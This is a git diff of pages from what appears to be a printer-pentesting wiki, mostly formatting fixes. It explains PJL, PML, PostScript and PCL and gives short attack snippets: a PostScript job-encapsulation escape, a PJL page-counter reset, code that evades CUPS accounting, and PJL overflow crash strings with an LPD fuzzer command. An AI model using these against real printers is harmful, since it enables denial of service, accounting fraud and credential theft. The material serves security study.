-**Sending data **to a printer device can be done by **USB/parallel cable** or over a **network**. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [_NCP_](https://en.wikipedia.org/wiki/NetWare_Core_Protocol) or [_AppleTalk_](https://en.wikipedia.org/wiki/AppleTalk). In the Windows world, _SMB/CIFS_ printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as _FTP_ or _HTTP_ file uploads. The **most common printing protocols** supported directly by **network **printers however are _**LPD**_**, **_**IPP**_**, and **_**raw port 9100** _printing. **Network printing protocols can be attacked directly**, for example by exploiting a buffer overflow in the printer's LPD daemon. In many attack scenarios however, they only act as a **carrier/channel** to **deploy malicious Printer language code**. Note that a **network printer usually supports multiple protocols to ‘print’** a document which broadens the attack surface.
+**Sending data** to a printer device can be done by **USB/parallel cable** or over a **network**. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [_NCP_](https://en.wikipedia.org/wiki/NetWare\_Core\_Protocol) or [_AppleTalk_](https://en.wikipedia.org/wiki/AppleTalk). In the Windows world, _SMB/CIFS_ printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as _FTP_ or _HTTP_ file uploads. The **most common printing protocols** supported directly by **network** printers however are _**LPD**_**, **_**IPP**_**, and **_**raw port 9100** _ printing. **Network printing protocols can be attacked directly**, for example by exploiting a buffer overflow in the printer's LPD daemon. In many attack scenarios however, they only act as a **carrier/channel** to **deploy malicious Printer language code**. Note that a **network printer usually supports multiple protocols to ‘print’** a document which broadens the attack surface.
 
-### **Learn more about **[**raw port 9100 here**](../9100-pjl.md)**.**
+### **Learn more about** [**raw port 9100 here**](../9100-pjl.md)**.**
 
-### **Learn more about **[**LPD in Pentesting 515 here**](../515-pentesting-line-printer-daemon-lpd.md)**.**
+### **Learn more about** [**LPD in Pentesting 515 here**](../515-pentesting-line-printer-daemon-lpd.md)**.**
 
-### **Learn more about **[**IPP in Petesting 631 here**](../pentesting-631-internet-printing-protocol-ipp.md)**.**
+### **Learn more about** [**IPP in Petesting 631 here**](../pentesting-631-internet-printing-protocol-ipp.md)**.**
 
 ## Printer Control Languages
 
-A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [CPCA](http://www.undocprint.org/formats/printer_control_languages/cpca), [XJCL](http://www.undocprint.org/formats/printer_control_languages/xjcl), [EJL](http://www.undocprint.org/formats/printer_control_languages/ejl) and **PJL **– which is supported by a variety of printers and will be discussed below. In addition, **printer control and management languages** are designed to **affect **not only a single print job but the **device **as a **whole**. One approach to define a common standard for this task was [NPAP](http://www.undocprint.org/formats/printer_control_languages/npap). However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use SNMP or its** PJL-based** metalanguage **PML**.
+A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [CPCA](http://www.undocprint.org/formats/printer\_control\_languages/cpca), [XJCL](http://www.undocprint.org/formats/printer\_control\_languages/xjcl), [EJL](http://www.undocprint.org/formats/printer\_control\_languages/ejl) and **PJL** – which is supported by a variety of printers and will be discussed below. In addition, **printer control and management languages** are designed to **affect** not only a single print job but the **device** as a **whole**. One approach to define a common standard for this task was [NPAP](http://www.undocprint.org/formats/printer\_control\_languages/npap). However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use SNMP or its **PJL-based** metalanguage **PML**.
 
 ### PJL
 
-The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ and can be used to change settings like paper tray or size. It must however be pointed out that **PJL is not limited to the current print job as some settings can be made permanent**. PJL can also be used to **change the printer's display or read/write files on the device**. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones.** PJL is further used to set the file format of the actual print data to follow**. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below:
+The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ and can be used to change settings like paper tray or size. It must however be pointed out that **PJL is not limited to the current print job as some settings can be made permanent**. PJL can also be used to **change the printer's display or read/write files on the device**. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. **PJL is further used to set the file format of the actual print data to follow**. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below:
 
 ```
 @PJL SET PAPER=A4
@@ -33,18 +33,18 @@ The Printer Job Language (PJL) was originally introduced by HP but soon became a
 @PJL ENTER LANGUAGE=POSTSCRIPT
 ```
 
-Inside the** **[**page about port 9100 'raw port'**](../9100-pjl.md)** **you can find more information about **how to enumerate PJL**.
+Inside the **** [**page about port 9100 'raw port'**](../9100-pjl.md) **** you can find more information about **how to enumerate PJL**.
 
 ### PML
 
-The **Printer Management Language** (PML) is a proprietary language to control **HP printers**. It basically **combines **the features of **SNMP** **with PJL**. Publicly available documentation has not been released, however parts of the standard were leaked by the [LPRng](https://en.wikipedia.org/wiki/LPRng) project: the **PJL Passthrough to PML and SNMP User’s Guide** defines defines PML as ‘an object-oriented request-reply printer management protocol’ and gives an introduction to the basics of the syntax. PML is embedded within PJL and **can be used to read and set SNMP values on a printer device**. This is especially **interesting **if a **firewall blocks **access to **SNMP **services (161/udp). The use of PML within a print job retrieving the `hrDeviceDescr` value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below:
+The **Printer Management Language** (PML) is a proprietary language to control **HP printers**. It basically **combines** the features of **SNMP** **with PJL**. Publicly available documentation has not been released, however parts of the standard were leaked by the [LPRng](https://en.wikipedia.org/wiki/LPRng) project: the **PJL Passthrough to PML and SNMP User’s Guide** defines defines PML as ‘an object-oriented request-reply printer management protocol’ and gives an introduction to the basics of the syntax. PML is embedded within PJL and **can be used to read and set SNMP values on a printer device**. This is especially **interesting** if a **firewall blocks** access to **SNMP** services (161/udp). The use of PML within a print job retrieving the `hrDeviceDescr` value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) is demonstrated below:
 
 ```
 > @PJL DMINFO ASCIIHEX="000006030302010301"
 < "8000000603030201030114106870204c617365724a65742034323530
 ```
 
-The rear part of string responded by the printer, `6870204c617365724a65742034323530` is hexadecimal for `hp LaserJet 4250`. As can be seen, it is possible to **invoke **(a subset of) **SNMP** **commands over PJL via PML**. A security-sensitive use of PML is to [reset HP printers to factory defaults](./#factory-defaults) via ordinary print jobs, therefore removing protection mechanisms like user-set passwords.
+The rear part of string responded by the printer, `6870204c617365724a65742034323530` is hexadecimal for `hp LaserJet 4250`. As can be seen, it is possible to **invoke** (a subset of) **SNMP** **commands over PJL via PML**. A security-sensitive use of PML is to [reset HP printers to factory defaults](./#factory-defaults) via ordinary print jobs, therefore removing protection mechanisms like user-set passwords.
 
 ### UEL
 
@@ -64,13 +64,13 @@ Otherwise, for example PJL settings like paper media size or PostScript definiti
 
 ## Page Description Languages
 
-A **page description language** (PDL) specifies the **appearance of the actual document**. It must however be pointed out that some PDLs offer limited job control, so** a clear demarcation between page description and printer/job control language is not always possible**. The function of a ‘printer driver’ is to **translate **the **file **to be **printed **into a **PDL **that is **understood **by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [GDI](https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers) printers only accept simple bitmap datastreams like [ZJS](http://www.undocprint.org/formats/page_description_languages/zjstream) while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [PRESCRIBE](http://www.undocprint.org/formats/page_description_languages/prescribe), [SPL](http://www.undocprint.org/formats/page_description_languages/spl), [XES](http://www.undocprint.org/formats/page_description_languages/xes), [CaPSL](http://www.undocprint.org/formats/page_description_languages/capsl), [RPCS](http://www.undocprint.org/formats/page_description_languages/rpcs), [ESC/P](https://en.wikipedia.org/wiki/ESC/P) which is mostly used in dot matrix printers or [HP-GL](https://en.wikipedia.org/wiki/HPGL) and [HP-GL/2](https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2) which have been designed for plotters. Support for direct [PDF](https://en.wikipedia.org/wiki/Portable_Document_Format) and [XPS](https://en.wikipedia.org/wiki/Open_XML_Paper_Specification) printing is also common on newer printers. **The most common ‘standard’ page description languages however are PostScript and PCL.**
+A **page description language** (PDL) specifies the **appearance of the actual document**. It must however be pointed out that some PDLs offer limited job control, so **a clear demarcation between page description and printer/job control language is not always possible**. The function of a ‘printer driver’ is to **translate** the **file** to be **printed** into a **PDL** that is **understood** by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [GDI](https://en.wikipedia.org/wiki/Graphics\_Device\_Interface#GDI\_printers) printers only accept simple bitmap datastreams like [ZJS](http://www.undocprint.org/formats/page\_description\_languages/zjstream) while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [PRESCRIBE](http://www.undocprint.org/formats/page\_description\_languages/prescribe), [SPL](http://www.undocprint.org/formats/page\_description\_languages/spl), [XES](http://www.undocprint.org/formats/page\_description\_languages/xes), [CaPSL](http://www.undocprint.org/formats/page\_description\_languages/capsl), [RPCS](http://www.undocprint.org/formats/page\_description\_languages/rpcs), [ESC/P](https://en.wikipedia.org/wiki/ESC/P) which is mostly used in dot matrix printers or [HP-GL](https://en.wikipedia.org/wiki/HPGL) and [HP-GL/2](https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2) which have been designed for plotters. Support for direct [PDF](https://en.wikipedia.org/wiki/Portable\_Document\_Format) and [XPS](https://en.wikipedia.org/wiki/Open\_XML\_Paper\_Specification) printing is also common on newer printers. **The most common ‘standard’ page description languages however are PostScript and PCL.**
 
 ### PostScript (PS)
 
 The term ‘page description’ may be misleading though, as **PostScript is capable of much more than just creating vector graphics**. PostScript is a stack-based, **Turing-complete** programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries and was created by Adobe.\
-Technically spoken, access to a PostScript interpreter can already be classified as** code execution **because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files.\
-Originally designed as a feature, the dangers of such functionality **were limited **before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [LaTeX](https://en.wikipedia.org/wiki/LaTeX) documents. Like **PJL **and **PCL**, **PostScript **supports **bidirectional communication **been host and printer.\
+Technically spoken, access to a PostScript interpreter can already be classified as **code execution** because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files.\
+Originally designed as a feature, the dangers of such functionality **were limited** before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [LaTeX](https://en.wikipedia.org/wiki/LaTeX) documents. Like **PJL** and **PCL**, **PostScript** supports **bidirectional communication** been host and printer.\
 Example PostScript code to echo Hello world to stdout is given below:
 
 ```
@@ -78,11 +78,11 @@ Example PostScript code to echo Hello world to stdout is given below:
 (Hello world) print
 ```
 
-Brother and Kyocera use their own PostScript clones: **Br-Script** and **KPDL**. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [denial of service](http://hacking-printers.net/wiki/index.php/Denial_of_service) (for example, through infinite loops), print job [manipulation](http://hacking-printers.net/wiki/index.php/Print_job_manipulation) and [retention](http://hacking-printers.net/wiki/index.php/Print_job_retention) as well as gaining access to the printer's [file system](http://hacking-printers.net/wiki/index.php/File_system_access).
+Brother and Kyocera use their own PostScript clones: **Br-Script** and **KPDL**. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [denial of service](http://hacking-printers.net/wiki/index.php/Denial\_of\_service) (for example, through infinite loops), print job [manipulation](http://hacking-printers.net/wiki/index.php/Print\_job\_manipulation) and [retention](http://hacking-printers.net/wiki/index.php/Print\_job\_retention) as well as gaining access to the printer's [file system](http://hacking-printers.net/wiki/index.php/File\_system\_access).
 
 #### Exiting the server loop
 
-Normally, each print job is encapsulated in its own, separate environment. One interesting feature of **PostScript **is that a program **can circumvent print job encapsulation** and alter the initial VM for subsequent jobs. To do so, it can use either startjob, a Level 2 feature:
+Normally, each print job is encapsulated in its own, separate environment. One interesting feature of **PostScript** is that a program **can circumvent print job encapsulation** and alter the initial VM for subsequent jobs. To do so, it can use either startjob, a Level 2 feature:
 
 ```
 true 0 startjob
@@ -98,13 +98,13 @@ This capability is controlled by the StartJobPassword which defaults to `0` (com
 
 #### Operator redefinition
 
-When a **PostScript **document **calls **an **operator**, the **first version found **on the dictionary stack is used. Operators usually reside in the systemdict dictionary, however by placing a new version into the userdict dictionary, operators can be practically overwritten because** the user-defined version is the first one found on the dictionary stack**. Using the startjob/exitserver operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below:
+When a **PostScript** document **calls** an **operator**, the **first version found** on the dictionary stack is used. Operators usually reside in the systemdict dictionary, however by placing a new version into the userdict dictionary, operators can be practically overwritten because **the user-defined version is the first one found on the dictionary stack**. Using the startjob/exitserver operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below:
 
 \
 [![The PostScript dictionary stack](http://hacking-printers.net/wiki/images/thumb/f/ff/Dictstack.png/300px-Dictstack.png)](http://hacking-printers.net/wiki/index.php/File:Dictstack.png)
 
 \
-The **potential impact of redefining operators** is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [denial of service](http://hacking-printers.net/wiki/index.php/Document_processing#Showpage_redefinition), print job [retention](http://hacking-printers.net/wiki/index.php/Print_job_retention) and [manipulation](http://hacking-printers.net/wiki/index.php/Print_job_manipulation). Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [RIP](https://en.wikipedia.org/wiki/Raster_image_processor).
+The **potential impact of redefining operators** is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [denial of service](http://hacking-printers.net/wiki/index.php/Document\_processing#Showpage\_redefinition), print job [retention](http://hacking-printers.net/wiki/index.php/Print\_job\_retention) and [manipulation](http://hacking-printers.net/wiki/index.php/Print\_job\_manipulation). Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [RIP](https://en.wikipedia.org/wiki/Raster\_image\_processor).
 
 ### PCL
 
@@ -114,14 +114,14 @@ PCL 3 and PCL 4 added support for fonts and macros which both can be permanently
 <Esc>Hello world
 ```
 
-Due to its limited capabilities, PCL is **hard to exploit** from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The **PRET **tool implements a **virtual, PCL-based file system** which uses macros to **save file content and metadata in the printer's memory**. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy.
+Due to its limited capabilities, PCL is **hard to exploit** from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The **PRET** tool implements a **virtual, PCL-based file system** which uses macros to **save file content and metadata in the printer's memory**. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy.
 
 ## Misc Attacks
 
 ### USB drive or cable
 
-Data can be sent to and received from a local printer by [USB](https://en.wikipedia.org/wiki/USB) or [parallel](https://en.wikipedia.org/wiki/IEEE\_1284) cables. Both channels are supported by **PRET **to communicate with the device. In addition, printers and MFPs often ship with Type-A USB ports which allows users to print directly from an USB device.\
-While plugged-in USB drives do** not offer a bidirectional channel**, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations.
+Data can be sent to and received from a local printer by [USB](https://en.wikipedia.org/wiki/USB) or [parallel](https://en.wikipedia.org/wiki/IEEE\_1284) cables. Both channels are supported by **PRET** to communicate with the device. In addition, printers and MFPs often ship with Type-A USB ports which allows users to print directly from an USB device.\
+While plugged-in USB drives do **not offer a bidirectional channel**, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations.
 
 ### Cross-site printing
 
@@ -130,19 +130,19 @@ Abusing **client web request** an attacker can **abuse arbitrary printers** insi
 
 ### Abusing Spooler service in AD
 
-If you can find any** Spool service listening** inside the domain, you may be able to **abuse **is to **obtain new credentials** and **escalate privileges**.\
+If you can find any **Spool service listening** inside the domain, you may be able to **abuse** is to **obtain new credentials** and **escalate privileges**.\
 [**More information about how to find a abuse Spooler services here.**](../../windows/active-directory-methodology/printers-spooler-service-abuse.md)****
 
 ## Privilege Escalation
 
 ### Factory Defaults
 
-There are several possible ways to** reset **a device to factory defaults, and this is a security-critical functionality as it **overwrites protection mechanisms **like user-set passwords.\
+There are several possible ways to **reset** a device to factory defaults, and this is a security-critical functionality as it **overwrites protection mechanisms** like user-set passwords.\
 [**Learn more here.**](factory-defaults.md)****
 
 ### **Accounting Bypass**
 
-You may be able to **impersonate existent or non-existent users** to print pages using their accounts or **manipulate **the hardware or software **counter **to be able to print more pages.\
+You may be able to **impersonate existent or non-existent users** to print pages using their accounts or **manipulate** the hardware or software **counter** to be able to print more pages.\
 [**Learn how to do it here.**](accounting-bypass.md)****
 
 ### **Scanner and Fax**
@@ -154,61 +154,61 @@ Accessing the Scanner of Fax functionalities you may be able to access other fun
 
 ### **Print Job Retention**
 
-Jobs can be** retained in memory** and be **printed **again in a** later moment from the control panel**, or using **PostScript **you can even **remotely access all the jobs that are going to be printed, download them** and print them.\
+Jobs can be **retained in memory** and be **printed** again in a **later moment from the control panel**, or using **PostScript** you can even **remotely access all the jobs that are going to be printed, download them** and print them.\
 [**Learn more here.**](print-job-retention.md)****
 
 ### **Print Job Manipulation**
 
-You can **add new content** to the pages that are printed,** change all the content** that is going to be printed or even **replace just certain letters or words.**\
+You can **add new content** to the pages that are printed, **change all the content** that is going to be printed or even **replace just certain letters or words.**\
 ****[**Learn how to do it here.**](print-job-manipulation.md)****
 
 ## **Information Disclosure**
 
 ### **Memory access**
 
-You may be able to **dump **the **NVRAM** memory and **extract sensitive **info (like passwords) from there.\
+You may be able to **dump** the **NVRAM** memory and **extract sensitive** info (like passwords) from there.\
 [**Read how to do that here.**](memory-access.md)****
 
 ### **File system access**
 
-You may be able to** access the file system** abusing **PJL **or **PostScript**.\
+You may be able to **access the file system** abusing **PJL** or **PostScript**.\
 [**Read how to do that here.**](file-system-access.md)****
 
 ### **Credentials Disclosure/Brute-Force**
 
-You may be able to** disclosure the password** being using abusing **SNMP **or the **LDAP **settings or you could try to **brute-force PJL** or **PostScript**.\
+You may be able to **disclosure the password** being using abusing **SNMP** or the **LDAP** settings or you could try to **brute-force PJL** or **PostScript**.\
 [**Read how to do that here**](credentials-disclosure-brute-force.md)**.**
 
 ## **Code Execution**
 
 ### **Buffer Overflows**
 
-Several **buffer overflows **have been **found **already in **PJL input **and in the **LPD daemon**, and there could be more.\
+Several **buffer overflows** have been **found** already in **PJL input** and in the **LPD daemon**, and there could be more.\
 [**Read this for more information.**](buffer-overflows.md)****
 
 ### Firmware updates
 
-You may be able to** make the printer update the driver to a malicious one** specially crafted by you.\
+You may be able to **make the printer update the driver to a malicious one** specially crafted by you.\
 [**Read this for more information.**](firmware-updates.md)****
 
 ### **Software Packages**
 
- printer vendors have started to introduce the **possibility to install custom software on their devices **but information is not publicly available. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors.\
+&#x20;printer vendors have started to introduce the **possibility to install custom software on their devices** but information is not publicly available. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors.\
 [**Read more about this here.**](software-packages.md)****
 
 ## **Denial of service**
 
 ### **Transmission channel**
 
-Occupying all the **connections **and **increasing **the **timeout **of the server could lead to a DoS.\
+Occupying all the **connections** and **increasing** the **timeout** of the server could lead to a DoS.\
 [**Learn more about this here.**](transmission-channel.md)****
 
 ### **Document Processing**
 
-You can use **PostScript **and **PJL **to perform **infinite loops**, **redefine commands** to avoid any printing, **turn off** any printing functionality or even **set the printer in offline mode**.\
+You can use **PostScript** and **PJL** to perform **infinite loops**, **redefine commands** to avoid any printing, **turn off** any printing functionality or even **set the printer in offline mode**.\
 [**Learn more about this here.**](document-processing.md)****
 
 ### **Physical damage**
 
-One could **abuse PJL **or **PostScript **to **write **in the **NVRAM **hundreds of thousands of times with the goal of **breaking the chip** or at least make the **parameters be frozen** intro the factory default ones.\
+One could **abuse PJL** or **PostScript** to **write** in the **NVRAM** hundreds of thousands of times with the goal of **breaking the chip** or at least make the **parameters be frozen** intro the factory default ones.\
 [**Learn more about this here.**](physical-damage.md)****
diff --git a/pentesting/pentesting-printers/accounting-bypass.md b/pentesting/pentesting-printers/accounting-bypass.md
index 35851989..bc9ca0db 100644
--- a/pentesting/pentesting-printers/accounting-bypass.md
+++ b/pentesting/pentesting-printers/accounting-bypass.md
@@ -19,9 +19,9 @@ There are basically two approaches to circumvent the print job accounting system
 
 ## Authentication bypasses
 
-LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [Kerberos](https://en.wikipedia.org/wiki/Kerberos_\(protocol\)), [PGP](https://en.wikipedia.org/wiki/Pretty_Good_Privacy) signed print jobs or HTTP [basic](https://en.wikipedia.org/wiki/Basic_access_authentication)/[digest](https://en.wikipedia.org/wiki/Digest_access_authentication) authentication. If **configured properly** and in case the attacker cannot access the printer directly she will be** not be able to impersonate other users**. Those security features however are **optional and rarely applied** in the real-world print servers. Instead, the **usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for** – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions**: Kerberos needs a special setup** on every client and **HTTP **authentication **requires **users to enter a **password **whenever they want to print something while the costs of a few unaccounted printouts are bearable.
+LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [Kerberos](https://en.wikipedia.org/wiki/Kerberos\_\(protocol\)), [PGP](https://en.wikipedia.org/wiki/Pretty\_Good\_Privacy) signed print jobs or HTTP [basic](https://en.wikipedia.org/wiki/Basic\_access\_authentication)/[digest](https://en.wikipedia.org/wiki/Digest\_access\_authentication) authentication. If **configured properly** and in case the attacker cannot access the printer directly she will be **not be able to impersonate other users**. Those security features however are **optional and rarely applied** in the real-world print servers. Instead, the **usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for** – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions**: Kerberos needs a special setup** on every client and **HTTP** authentication **requires** users to enter a **password** whenever they want to print something while the costs of a few unaccounted printouts are bearable.
 
-You can **verify proper authentication** trying to print with a** custom username** like this:
+You can **verify proper authentication** trying to print with a **custom username** like this:
 
 ```
 lp -U nobody test.ps
@@ -31,7 +31,7 @@ lp -U nobody test.ps
 
 ### Hardware page counters
 
-For correct accounting the **number of printed pages must be determined** by the printing system which is not a trivial task. The authors of **LPRng **_make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles_. Such **hardware page counters** are supported by most printers and **read** by LPRng **using PJL after **every **print **job. **HP **has even documented a feature to **write** to the** page counter** variable by setting the printer into service mode. This way, the** page counter** of the _HP LaserJet 1200, HP LaserJet 4200N _and_ HP LaserJet 4250N_ **can be manipulated** within a print job. At the end of the document to be printed and separated by the [UEL](./#uel), the counter simply has to be reset to its original value (for example, `2342`):
+For correct accounting the **number of printed pages must be determined** by the printing system which is not a trivial task. The authors of **LPRng** _make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles_. Such **hardware page counters** are supported by most printers and **read** by LPRng **using PJL after** every **print** job. **HP** has even documented a feature to **write** to the **page counter** variable by setting the printer into service mode. This way, the **page counter** of the _HP LaserJet 1200, HP LaserJet 4200N_ and _HP LaserJet 4250N_ **can be manipulated** within a print job. At the end of the document to be printed and separated by the [UEL](./#uel), the counter simply has to be reset to its original value (for example, `2342`):
 
 ```
 \x1b%-12345X@PJL JOB
@@ -60,7 +60,7 @@ New pagecounter: 10
 
 ### Software page counters
 
-**CUPS **uses **software page counters** which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the PageCount system parameter exists – which will return false when interpreted in CUPS/Ghostscript – before actually printing the document as shown below.
+**CUPS** uses **software page counters** which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the PageCount system parameter exists – which will return false when interpreted in CUPS/Ghostscript – before actually printing the document as shown below.
 
 ```
 currentsystemparams (PageCount) known {
@@ -68,11 +68,11 @@ currentsystemparams (PageCount) known {
 } if
 ```
 
-This way, the accounting software used by CUPS renders a different document than the printer. **CUPS only accounts for one page** – which seems to be a **hardcoded minimum **– while the **real **print job can contain **hundreds** **of pages**. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter.
+This way, the accounting software used by CUPS renders a different document than the printer. **CUPS only accounts for one page** – which seems to be a **hardcoded minimum** – while the **real** print job can contain **hundreds** **of pages**. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter.
 
 **How to test for this attack?**
 
-**Wrap **an arbitrary **multi-page PostScript document** in the **code above** and print. Then go to [`http://printserver:631/jobs?which_jobs=all`](http://printserver:631/jobs?which_jobs=all) and check CUPS's page counter for this print job. Note that have to establish a raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done by setting the content type to `application/vnd.cups-raw`. If your system is already configured to use the print server to be tested, simply use:
+**Wrap** an arbitrary **multi-page PostScript document** in the **code above** and print. Then go to [`http://printserver:631/jobs?which_jobs=all`](http://printserver:631/jobs?which\_jobs=all) and check CUPS's page counter for this print job. Note that have to establish a raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done by setting the content type to `application/vnd.cups-raw`. If your system is already configured to use the print server to be tested, simply use:
 
 ```
 lp -o raw test.ps
diff --git a/pentesting/pentesting-printers/buffer-overflows.md b/pentesting/pentesting-printers/buffer-overflows.md
index d6fbc35d..6fa2adfb 100644
--- a/pentesting/pentesting-printers/buffer-overflows.md
+++ b/pentesting/pentesting-printers/buffer-overflows.md
@@ -2,7 +2,7 @@
 
 ## PJL
 
-Various_ Lexmark_ laser printers crash when when receiving about 1.000 characters as the INQUIRE argument (see [CVE-2010-0619](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619)) and sending about 3.000 characters as the SET argument to the _Dell 1720n_ crashes the device:
+Various _Lexmark_ laser printers crash when when receiving about 1.000 characters as the INQUIRE argument (see [CVE-2010-0619](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619)) and sending about 3.000 characters as the SET argument to the _Dell 1720n_ crashes the device:
 
 ```
 @PJL INQUIRE 00000000000000000000000000000000000000000000000000000…
@@ -37,12 +37,12 @@ Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
 
 ## LPD daemon
 
-It allows multiple user-defined vectors like_ jobname, username or hostname_, which may **not be sufficiently protected. S**everal vulnerabilities related to this malfunction has been already discovered.
+It allows multiple user-defined vectors like _jobname, username or hostname_, which may **not be sufficiently protected. S**everal vulnerabilities related to this malfunction has been already discovered.
 
-A simple **LPD fuzzer** to test for buffer overflows can be created using the `lpdtest` tool **included **in [PRET](https://github.com/RUB-NDS/PRET). The `in` argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):
+A simple **LPD fuzzer** to test for buffer overflows can be created using the `lpdtest` tool **included** in [PRET](https://github.com/RUB-NDS/PRET). The `in` argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):
 
 ```bash
 ./lpdtest.py printer in "`python -c 'print "x"*150'`"
 ```
 
-**You can find more information about these attacks in **[**http://hacking-printers.net/wiki/index.php/Buffer_overflows**](http://hacking-printers.net/wiki/index.php/Buffer_overflows)****
+**You can find more information about these attacks in** [**http://hacking-printers.net/wiki/index.php/Buffer\_overflows**](http://hacking-printers.net/wiki/index.php/Buffer\_overflows)****
diff --git a/pentesting/pentesting-printers/credentials-disclosure-brute-force.md b/pentesting/pentesting-printers/credentials-disclosure-brute-force.md
index 0f627c9e..9298f3bf 100644
--- a/pentesting/pentesting-printers/credentials-disclosure-brute-force.md
+++ b/pentesting/pentesting-printers/credentials-disclosure-brute-force.md
@@ -1,6 +1,6 @@
 # Credentials Disclosure / Brute-Force
 
-Printers are commonly deployed with a** default password or no initial password at all**. In both cases, end-users or administrators have to actively set a password to secure the device.
+Printers are commonly deployed with a **default password or no initial password at all**. In both cases, end-users or administrators have to actively set a password to secure the device.
 
 ## Password Disclosure
 
@@ -16,7 +16,7 @@ iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
 ### Pass-Back
 
